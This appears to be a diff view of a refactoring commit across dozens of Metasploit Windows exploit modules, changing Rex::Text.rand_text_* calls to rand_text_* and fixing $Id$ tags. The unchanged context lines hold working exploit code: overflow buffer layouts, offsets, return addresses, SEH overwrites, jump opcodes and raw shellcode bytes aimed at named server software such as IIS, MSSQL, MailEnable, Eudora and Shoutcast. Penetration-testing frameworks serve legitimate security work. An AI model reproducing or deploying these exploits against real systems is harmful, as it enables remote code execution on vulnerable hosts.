||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -74,7 +74,7 @@ class Exploits::Windows::Http::MaxDB_WebDBM_GET_Overflow < Msf::Exploit::Remote
|
||||||
# Trigger the SEH by writing past the end of the page after
|
# Trigger the SEH by writing past the end of the page after
|
||||||
# the SEH is already overwritten. This avoids the other smashed
|
# the SEH is already overwritten. This avoids the other smashed
|
||||||
# pointer exceptions and goes straight to the payload.
|
# pointer exceptions and goes straight to the payload.
|
||||||
buf = Rex::Text.rand_text_alphanumeric(16384)
|
buf = rand_text_alphanumeric(16384)
|
||||||
buf[1586, payload.encoded.length] = payload.encoded
|
buf[1586, payload.encoded.length] = payload.encoded
|
||||||
buf[3638, 5] = "\xe9" + [-2052].pack('V')
|
buf[3638, 5] = "\xe9" + [-2052].pack('V')
|
||||||
buf[3643, 2] = "\xeb\xf9"
|
buf[3643, 2] = "\xeb\xf9"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -67,7 +67,7 @@ class Exploits::Windows::Http::Minishare_GET_Overflow < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
uri = Rex::Text.rand_text_alphanumeric(target['Rets'][0])
|
uri = rand_text_alphanumeric(target['Rets'][0])
|
||||||
uri << [target['Rets'][1]].pack('V')
|
uri << [target['Rets'][1]].pack('V')
|
||||||
uri << payload.encoded
|
uri << payload.encoded
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -72,7 +72,7 @@ class Exploits::Windows::Http::Navicopa_Get_Overflow < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alphanumeric(228, payload_badchars)
|
sploit = rand_text_alphanumeric(228, payload_badchars)
|
||||||
sploit << [target.ret].pack('V') + payload.encoded
|
sploit << [target.ret].pack('V') + payload.encoded
|
||||||
|
|
||||||
uri = '/' + sploit
|
uri = '/' + sploit
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -59,7 +59,7 @@ class Exploits::Windows::Http::NovellMessengerAcceptLanguage < Msf::Exploit::Rem
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
lang = Rex::Text.rand_text_alphanumeric(1900)
|
lang = rand_text_alphanumeric(1900)
|
||||||
lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC
|
lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC
|
||||||
lang[272, 4] = [target['Rets'][1]].pack('V') # DST
|
lang[272, 4] = [target['Rets'][1]].pack('V') # DST
|
||||||
lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP
|
lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -77,8 +77,8 @@ class Exploits::Windows::Http::Oracle9i_Xdb_Pass < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_english(4, payload_badchars) + ":"
|
sploit = rand_text_english(4, payload_badchars) + ":"
|
||||||
sploit << Rex::Text.rand_text_english(442, payload_badchars)
|
sploit << rand_text_english(442, payload_badchars)
|
||||||
sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V')
|
sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V')
|
||||||
sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded
|
sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -60,7 +60,7 @@ class Exploits::Windows::Http::PeerCast_URL < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
pat = Rex::Text.rand_text_alphanumeric(1024)
|
pat = rand_text_alphanumeric(1024)
|
||||||
pat[768, 4] = [target.ret].pack('V')
|
pat[768, 4] = [target.ret].pack('V')
|
||||||
pat[812, 5] = [0xe9, -517].pack('CV')
|
pat[812, 5] = [0xe9, -517].pack('CV')
|
||||||
pat[300, payload.encoded.length] = payload.encoded
|
pat[300, payload.encoded.length] = payload.encoded
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -95,7 +95,7 @@ class Exploits::Windows::Http::Shoutcast_Format < Msf::Exploit::Remote
|
||||||
|
|
||||||
num = 1046 - payload.encoded.length
|
num = 1046 - payload.encoded.length
|
||||||
uri = '/content/%#0' + num.to_s + 'x' + payload.encoded
|
uri = '/content/%#0' + num.to_s + 'x' + payload.encoded
|
||||||
uri << "\xeb\x06" + Rex::Text.rand_text_alphanumeric(2)
|
uri << "\xeb\x06" + rand_text_alphanumeric(2)
|
||||||
uri << [target.ret].pack('V')
|
uri << [target.ret].pack('V')
|
||||||
uri << "\xe9\x2d\xff\xff\xff"
|
uri << "\xe9\x2d\xff\xff\xff"
|
||||||
uri << '#0100x.mp3'
|
uri << '#0100x.mp3'
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -65,7 +65,7 @@ include Exploit::Remote::Tcp
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
pat = Rex::Text.rand_text_alphanumeric(4000)
|
pat = rand_text_alphanumeric(4000)
|
||||||
pat[8,4] = [target.ret].pack('V')
|
pat[8,4] = [target.ret].pack('V')
|
||||||
pat[103, payload.encoded.length] = payload.encoded
|
pat[103, payload.encoded.length] = payload.encoded
|
||||||
pat = Rex::Text.uri_encode(pat)
|
pat = Rex::Text.uri_encode(pat)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -70,7 +70,7 @@ class Exploits::Windows::Http::Sybase_Easerver < Msf::Exploit::Remote
|
||||||
print_status( "Attempting to exploit...")
|
print_status( "Attempting to exploit...")
|
||||||
|
|
||||||
# Building the evil buffer
|
# Building the evil buffer
|
||||||
crash = Rex::Text.rand_text_alphanumeric(5000, payload_badchars)
|
crash = rand_text_alphanumeric(5000, payload_badchars)
|
||||||
crash[ target['Offset'] - 4, 2 ] = "\xeb\x06"
|
crash[ target['Offset'] - 4, 2 ] = "\xeb\x06"
|
||||||
crash[ target['Offset'] , 4 ] = [target.ret].pack('V')
|
crash[ target['Offset'] , 4 ] = [target.ret].pack('V')
|
||||||
crash[ target['Offset'] + 4, payload.encoded.length ] = payload.encoded
|
crash[ target['Offset'] + 4, payload.encoded.length ] = payload.encoded
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -95,7 +95,7 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
c = connect
|
c = connect
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(8192)
|
buf = rand_text_english(8192)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
buf[257, seh.length] = seh
|
buf[257, seh.length] = seh
|
||||||
|
|
||||||
|
@ -124,7 +124,7 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
def fingerprint
|
def fingerprint
|
||||||
|
|
||||||
res = download(Rex::Text.rand_text_alphanumeric(12) + '.txt') || return
|
res = download(rand_text_alphanumeric(12) + '.txt') || return
|
||||||
|
|
||||||
m = res.match(/in <b>(.*)<\/b> on line/smi)
|
m = res.match(/in <b>(.*)<\/b> on line/smi)
|
||||||
return if not m
|
return if not m
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -84,10 +84,10 @@ class Exploits::Windows::Iis::MS01_033_IDQ < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alphanumeric(1) + ".idq?" + Rex::Text.rand_text_alphanumeric(232, payload_badchars)
|
sploit = rand_text_alphanumeric(1) + ".idq?" + rand_text_alphanumeric(232, payload_badchars)
|
||||||
sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4]
|
sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4]
|
||||||
sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=" + Rex::Text.rand_text_alphanumeric(1)
|
sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=" + rand_text_alphanumeric(1)
|
||||||
sploit << " HTTP/1.0\r\n" + make_nops(10) + Rex::Text.rand_text_alphanumeric(36, payload_badchars)
|
sploit << " HTTP/1.0\r\n" + make_nops(10) + rand_text_alphanumeric(36, payload_badchars)
|
||||||
|
|
||||||
uri = '/' + sploit + payload.encoded
|
uri = '/' + sploit + payload.encoded
|
||||||
|
|
||||||
|
|
|
@ -134,7 +134,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
||||||
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
|
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
|
||||||
|
|
||||||
if datastore['invalid_search_request'] == true
|
if datastore['invalid_search_request'] == true
|
||||||
xml = Rex::Text.rand_text(rand(1024) + 32)
|
xml = rand_text(rand(1024) + 32)
|
||||||
end
|
end
|
||||||
|
|
||||||
# The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
|
# The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -73,9 +73,9 @@ class Exploits::Windows::Imap::Eudora_List < Msf::Exploit::Remote
|
||||||
jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
|
jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
|
||||||
jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"
|
jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"
|
||||||
|
|
||||||
sploit = "a001 LIST " + Rex::Text.rand_text_alpha_upper(20, payload_badchars)
|
sploit = "a001 LIST " + rand_text_alpha_upper(20, payload_badchars)
|
||||||
sploit << payload.encoded + "\xeb\x06" + make_nops(2) + [target.ret].pack('V')
|
sploit << payload.encoded + "\xeb\x06" + make_nops(2) + [target.ret].pack('V')
|
||||||
sploit << make_nops(8) + jmp + Rex::Text.rand_text_alpha_upper(40, payload_badchars)
|
sploit << make_nops(8) + jmp + rand_text_alpha_upper(40, payload_badchars)
|
||||||
sploit << "}" + "\r\n"
|
sploit << "}" + "\r\n"
|
||||||
|
|
||||||
sock.put(sploit)
|
sock.put(sploit)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -74,7 +74,7 @@ class Exploits::Windows::Imap::IMailIMAPDeleteOverflow < Msf::Exploit::Remote
|
||||||
# Jump over code
|
# Jump over code
|
||||||
req << "\x74\x32\x75\x30"
|
req << "\x74\x32\x75\x30"
|
||||||
req << [target.ret].pack('V')
|
req << [target.ret].pack('V')
|
||||||
req << Rex::Text.rand_text_alphanumeric(44)
|
req << rand_text_alphanumeric(44)
|
||||||
|
|
||||||
# GetEIP code
|
# GetEIP code
|
||||||
req << "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59"
|
req << "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59"
|
||||||
|
@ -87,7 +87,7 @@ class Exploits::Windows::Imap::IMailIMAPDeleteOverflow < Msf::Exploit::Remote
|
||||||
req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a"
|
req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a"
|
||||||
|
|
||||||
# Run off the stack, so we don't kill our payload, or something...
|
# Run off the stack, so we don't kill our payload, or something...
|
||||||
req << Rex::Text.rand_text_alphanumeric(600)
|
req << rand_text_alphanumeric(600)
|
||||||
|
|
||||||
# Terminate the request
|
# Terminate the request
|
||||||
req << "\r\n"
|
req << "\r\n"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -59,8 +59,8 @@ class Exploits::Windows::Imap::MailEnableImapLoginOverflow < Msf::Exploit::Remot
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
auth = "a001 LOGIN " + Rex::Text.rand_text_alpha_upper(4) + " {10}\r\n"
|
auth = "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n"
|
||||||
sploit = Rex::Text.rand_text_alpha_upper(556) + [target.ret].pack('V')
|
sploit = rand_text_alpha_upper(556) + [target.ret].pack('V')
|
||||||
sploit << payload.encoded + "\r\n\r\n"
|
sploit << payload.encoded + "\r\n\r\n"
|
||||||
|
|
||||||
res = sock.recv(50)
|
res = sock.recv(50)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -66,7 +66,7 @@ class Exploits::Windows::Imap::MailEnableImapStatusOverflow < Msf::Exploit::Remo
|
||||||
connect_login
|
connect_login
|
||||||
|
|
||||||
seh = generate_seh_payload(target['Rets'][1])
|
seh = generate_seh_payload(target['Rets'][1])
|
||||||
buf = Rex::Text.rand_text_alphanumeric(target['Rets'][0])
|
buf = rand_text_alphanumeric(target['Rets'][0])
|
||||||
req = "a001 STATUS \".\x00" + buf + seh
|
req = "a001 STATUS \".\x00" + buf + seh
|
||||||
req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n"
|
req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n"
|
||||||
sock.put(req)
|
sock.put(req)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -72,7 +72,7 @@ class Exploits::Windows::Imap::MailEnableImapW3CLoggingSelectOverflow < Msf::Exp
|
||||||
def exploit
|
def exploit
|
||||||
connect_login
|
connect_login
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_alphanumeric(6196, payload_badchars)
|
buf = rand_text_alphanumeric(6196, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
req = 'a01 SELECT ' + buf + seh + "\r\n"
|
req = 'a01 SELECT ' + buf + seh + "\r\n"
|
||||||
sock.put(req)
|
sock.put(req)
|
||||||
|
|
|
@ -68,7 +68,7 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Creating overflow request for fp30reg.dll...")
|
print_status("Creating overflow request for fp30reg.dll...")
|
||||||
|
|
||||||
pat = Rex::Text.rand_text_alphanumeric(0xdead)
|
pat = rand_text_alphanumeric(0xdead)
|
||||||
pat[128, 4] = [target.ret].pack('V')
|
pat[128, 4] = [target.ret].pack('V')
|
||||||
pat[264, 4] = [target.ret].pack('V')
|
pat[264, 4] = [target.ret].pack('V')
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -88,7 +88,7 @@ class Exploits::Windows::Isapi::RSA_WebAgent_Redirect < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
pat = Rex::Text.rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
|
pat = rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
|
||||||
seh = generate_seh_payload(target['Rets'][1])
|
seh = generate_seh_payload(target['Rets'][1])
|
||||||
pat[target['Rets'][0]-4, seh.length] = seh
|
pat[target['Rets'][0]-4, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -105,7 +105,7 @@ class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(8192, payload_badchars)
|
buf = rand_text_english(8192, payload_badchars)
|
||||||
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
|
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
|
||||||
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
|
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
|
||||||
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
|
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -85,7 +85,7 @@ class Exploits::Windows::License::Sentinel_LM7_UDP_Overflow < Msf::Exploit::Remo
|
||||||
connect_udp
|
connect_udp
|
||||||
|
|
||||||
# Payload goes first
|
# Payload goes first
|
||||||
buf = payload.encoded + Rex::Text.rand_text_english(2048-payload.encoded.length)
|
buf = payload.encoded + rand_text_english(2048-payload.encoded.length)
|
||||||
|
|
||||||
# Return to a pop/pop/ret via SEH
|
# Return to a pop/pop/ret via SEH
|
||||||
buf[836, 4] = [target.ret].pack('V')
|
buf[836, 4] = [target.ret].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -64,7 +64,7 @@ class Exploits::Windows::Lpd::Hummingbird_Exceed_Lpd < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
filler = Rex::Text.rand_text_english(target['Offset'], payload_badchars)
|
filler = rand_text_english(target['Offset'], payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
sploit = filler + seh
|
sploit = filler + seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -58,7 +58,7 @@ class Exploits::Windows::Lpd::HNIPrintd < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
req = Rex::Text.rand_text_alphanumeric(8192)
|
req = rand_text_alphanumeric(8192)
|
||||||
req[ 0, 2] = "\xeb\x33"
|
req[ 0, 2] = "\xeb\x33"
|
||||||
req[ 49, 4] = [target.ret].pack('V')
|
req[ 49, 4] = [target.ret].pack('V')
|
||||||
req[ 53, payload.encoded.length ] = payload.encoded
|
req[ 53, payload.encoded.length ] = payload.encoded
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -92,7 +92,7 @@ class Exploits::Windows::Misc::Eiqnetworks_LICMGR_ADDLICENSE < Msf::Exploit::Rem
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
filler = Rex::Text.rand_text_english(1) * (target['Offset'] - payload.encoded.length)
|
filler = rand_text_english(1) * (target['Offset'] - payload.encoded.length)
|
||||||
sploit = "LICMGR_ADDLICENSE&" + filler + payload.encoded + [target.ret].pack('V') + "&";
|
sploit = "LICMGR_ADDLICENSE&" + filler + payload.encoded + [target.ret].pack('V') + "&";
|
||||||
|
|
||||||
sock.put(sploit)
|
sock.put(sploit)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -73,7 +73,7 @@ class Exploits::Windows::Misc::Eiqnetworks_Esa_Topology_DELETEDEVICE < Msf::Expl
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
filler = Rex::Text.rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20)
|
filler = rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20)
|
||||||
|
|
||||||
sploit = "DELETEDEVICE&" + filler + payload.encoded
|
sploit = "DELETEDEVICE&" + filler + payload.encoded
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -61,7 +61,7 @@ class Exploits::Windows::Misc::Goodtech_Telnet < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_english(10020, payload_badchars)
|
sploit = rand_text_english(10020, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
|
|
||||||
sploit[10012, seh.length] = seh
|
sploit[10012, seh.length] = seh
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -68,7 +68,7 @@ class Exploits::Windows::Misc::Mercury_Phonebook < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alphanumeric(224, payload_badchars)
|
sploit = rand_text_alphanumeric(224, payload_badchars)
|
||||||
sploit << payload.encoded + "\xeb\x06" + make_nops(2)
|
sploit << payload.encoded + "\xeb\x06" + make_nops(2)
|
||||||
sploit << [target.ret].pack('V') + [0xe8, -450].pack('CV') + "\r\n"
|
sploit << [target.ret].pack('V') + [0xe8, -450].pack('CV') + "\r\n"
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -69,14 +69,14 @@ class Exploits::Windows::Misc::Shixxnote_font < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alpha_upper(8, payload_badchars)
|
sploit = rand_text_alpha_upper(8, payload_badchars)
|
||||||
sploit += "~~"
|
sploit += "~~"
|
||||||
sploit += Rex::Text.rand_text_alpha_upper(118, payload_badchars)
|
sploit += rand_text_alpha_upper(118, payload_badchars)
|
||||||
|
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
|
|
||||||
sploit[112, seh.length] = seh
|
sploit[112, seh.length] = seh
|
||||||
sploit += Rex::Text.rand_text_alpha_upper(200, payload_badchars)
|
sploit += rand_text_alpha_upper(200, payload_badchars)
|
||||||
sploit += "~" * 10
|
sploit += "~" * 10
|
||||||
|
|
||||||
sock.put(sploit)
|
sock.put(sploit)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -89,7 +89,7 @@ class Exploits::Windows::Mssql::MS02_039_ResOverflow < Msf::Exploit::Remote
|
||||||
print_status("Execute 'net start sqlserveragent' once access is obtained");
|
print_status("Execute 'net start sqlserveragent' once access is obtained");
|
||||||
|
|
||||||
# \x68:888 => push dword 0x3838383a
|
# \x68:888 => push dword 0x3838383a
|
||||||
buf = "\x04" + Rex::Text.rand_text_english(800, payload_badchars) + "\x68:888"
|
buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"
|
||||||
|
|
||||||
# Return to the stack pointer
|
# Return to the stack pointer
|
||||||
buf[ 97, 4] = [target.ret].pack('V')
|
buf[ 97, 4] = [target.ret].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -80,14 +80,14 @@ class Exploits::Windows::Mssql::MS02_056_HelloOverflow < Msf::Exploit::Remote
|
||||||
buf = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b" +
|
buf = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b" +
|
||||||
"\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" +
|
"\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" +
|
||||||
"\x10\x00\x00\x00" +
|
"\x10\x00\x00\x00" +
|
||||||
Rex::Text.rand_text_english(528, payload_badchars) +
|
rand_text_english(528, payload_badchars) +
|
||||||
"\x1B\xA5\xEE\x34" +
|
"\x1B\xA5\xEE\x34" +
|
||||||
Rex::Text.rand_text_english(4, payload_badchars) +
|
rand_text_english(4, payload_badchars) +
|
||||||
[ target['Rets'][0] ].pack('V') +
|
[ target['Rets'][0] ].pack('V') +
|
||||||
[ target['Rets'][1], target['Rets'][1] ].pack('VV') +
|
[ target['Rets'][1], target['Rets'][1] ].pack('VV') +
|
||||||
'3333' +
|
'3333' +
|
||||||
[ target['Rets'][1], target['Rets'][1] ].pack('VV') +
|
[ target['Rets'][1], target['Rets'][1] ].pack('VV') +
|
||||||
Rex::Text.rand_text_english(88, payload_badchars) +
|
rand_text_english(88, payload_badchars) +
|
||||||
payload.encoded +
|
payload.encoded +
|
||||||
"\x00\x24\x01\x00\x00"
|
"\x00\x24\x01\x00\x00"
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -73,7 +73,7 @@ class Exploits::Windows::Proxy::Bluecoat_WinProxy_Host < Msf::Exploit::Remote
|
||||||
|
|
||||||
sploit = "GET / HTTP/1.1" + "\r\n"
|
sploit = "GET / HTTP/1.1" + "\r\n"
|
||||||
sploit += "Host: 127.0.0.1:"
|
sploit += "Host: 127.0.0.1:"
|
||||||
sploit += Rex::Text.rand_text_english(31, payload_badchars)
|
sploit += rand_text_english(31, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
sploit[23, seh.length] = seh
|
sploit[23, seh.length] = seh
|
||||||
sploit += "\r\n\r\n"
|
sploit += "\r\n\r\n"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
